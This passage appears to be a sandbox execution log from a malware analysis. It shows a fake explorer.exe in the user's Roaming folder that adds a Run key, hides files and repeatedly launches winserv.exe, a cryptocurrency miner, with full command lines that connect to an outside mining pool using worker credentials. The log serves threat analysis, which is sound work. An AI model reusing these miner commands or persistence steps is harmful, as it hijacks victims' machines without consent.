C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2996 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4972
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5096
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2176
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1952 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4388
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3096
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3812 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1392
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4968 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2792
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2136 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2520
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4932 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:440 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1584
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
PID:3632 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3332
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4832
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4344
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4776 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4020
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2064
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:836 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:760
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:2312 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:1640 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3712
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:976 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2792
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:3732 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3668
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3124
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Adds Run key to start application
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4364
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4152
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4584
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2216 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1844 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1728
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4444
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1828
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1232 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:736
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1604
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:324
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2136
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:452
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:920
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3476
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1392
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2700
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4952
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4524
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:400
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4152
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4120
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4584
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:64
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3156
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5000
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4464
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1452
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3876
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:324
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4624
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3892
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2024
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5032
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:664
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2472
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2416
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:220
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3980
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3332
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3500
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1328
-
